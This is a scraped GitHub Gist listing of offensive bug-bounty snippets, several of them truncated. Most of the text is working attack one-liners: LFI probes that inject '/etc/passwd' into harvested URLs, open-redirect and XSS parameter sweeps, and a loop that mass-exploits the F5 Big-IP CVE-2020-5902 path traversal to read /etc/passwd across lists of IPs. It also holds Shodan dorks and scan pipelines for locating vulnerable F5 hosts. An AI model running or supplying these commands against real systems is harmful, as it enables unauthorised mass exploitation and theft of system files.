Skip to content

Instantly share code, notes, and snippets.

@0x240x23elu
0x240x23elu / sqli2.yaml
Last active December 12, 2023 02:14
Basic SQL Injection Detections nuclei Template
id: SQLInjection_ERROR
info:
name: SQLINJECTION Detection
author: 0x240x23elu & OFJAAAH
severity: High
requests:
- method: GET
#!/usr/bin/env bash
#httpx
tabhttpx0=$(httpx -h 2>&1 | grep " -" | awk -F " " '{print $1}' | sed -z 's/\n/ /g')
tabhttpx='echo -e "$tabhttpx0"'
complete -W "\$($tabhttpx)" httpx
#subfinder
tabsub0=$(subfinder -h 2>&1 | grep " -" | awk -F " " '{print $1}' | sed -z 's/\n/ /g')
tabsub='echo -e "$tabsub0"'
complete -W "\$($tabsub)" subfinder
#naabu
@dwisiswant0
dwisiswant0 / bash_aliases.sh
Last active March 12, 2024 17:17
One-liner to get Open-redirect & LFI
lfi() {
gau $1 | gf lfi | qsreplace "/etc/passwd" | xargs -I % -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
}
open-redirect() {
local LHOST="http://localhost"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'
}
assetfinder site.com | gau|egrep -v '(.css|.png|.jpeg|.jpg|.svg|.gif|.wolf)'|while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Zo-9_]+" |sed -e 's, 'var','"$url"?',g' -e 's/ //g'|grep -v '.js'|sed 's/.*/&=xss/g'):echo -e "\e[1;33m$url\n" "\e[1;32m$vars";done
@muff-in
muff-in / resources.md
Last active April 27, 2024 22:37
A curated list of Assembly Language / Reversing / Malware Analysis / Game Hacking-resources
@dubey-amit
dubey-amit / Unique wayback url
Last active July 8, 2022 14:03
Get all the Wayback endpoints to compare it with your Burp crawled URLs & probe all the unique endpoints.
cat urls | unfurl -u format %s://%d%p > unique && sort -uo unique unique && cat unique | unfurl -u domains | waybackurls | unfurl -u format %s://%d%p > wayurl && sort -uo wayurl wayurl | comm -1 -3 unique wayurl > final && rm urls && rm unique && rm wayurl && httpx -l final --status-code -silent --content-length | grep -i 200
@AICDEV
AICDEV / flutter_ios.js
Last active November 2, 2023 02:36
Frida trace Flutter Functions on iOS
/**
* run the script to a running app: frida -U "appName" -l flutter_ios.js --no-pause
* start app direct with the script: frida -Uf bundleIdentifier -l flutter_ios.js --no-pause
*/
// #############################################
// HELPER SECTION START
var colors = {
"resetColor": "\x1b[0m",
"green": "\x1b[32m",
"yellow": "\x1b[33m",
@Sy3Omda
Sy3Omda / f5.sh
Created July 9, 2020 11:50
Big-IP F5 CVE-2020-5902
while read ip ; do if [[ $(curl -skL -m 1 --no-keepalive --connect-timeout 2 "https://$ip/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd" | grep -io "root:x") == "root:x" ]]
then
echo -e "\033[0;31m""Vulnerable Big-IP in ==> $ip""\033[0m"
fi ; done < $1
@LuD1161
LuD1161 / f5_here_i_come.sh
Last active March 8, 2022 02:52
F5 Slapdash attempt
# Get all the F5 IPs from Shodan | Get script here : https://gist.github.com/LuD1161/2087aea80e8771a4af069c33b4078570
python3 shodan_query.py "http.favicon.hash:-335242539" results_f5.txt | tee -a output.txt
cat output.txt | grep -i "host :" | cut -d":" -f2 | cut -d" " -f2 | httpx -threads 400 -ports 80,443,8443,4443 -silent | nuclei -t cves/CVE-2020-5902.yaml -o results.txt
cut -d" " -f3 results.txt > targets.txt
sed -i -e "s/\.\;/\.\\\;/g" targets.txt # escape semicolon to pass to interlace
interlace -tL ./targets.txt -threads 100 -c "echo _target_; curl --insecure -v _target_ 2>&1 | awk 'BEGIN { cert=0 } /^\* SSL connection/ { cert=1 } /^\*/ { if (cert) print }'" -v | tee -a all_certs.txt
@cihanmehmet
cihanmehmet / CVE-2020-5902.md
Last active January 29, 2024 12:34
BIGIP CVE-2020-5902 Exploit POC

🚨BIGIP CVE-2020-5902 Exploit POC 🔥🧱🔨👀


Shodan Seaarch

title:"Big-IP&reg;" org:"Organization Name"
http.title:"BIG-IP&reg;- Redirect" org:"Organization Name"
http.favicon.hash:-335242539 "3992" org:"Organization Name"

🔸LFI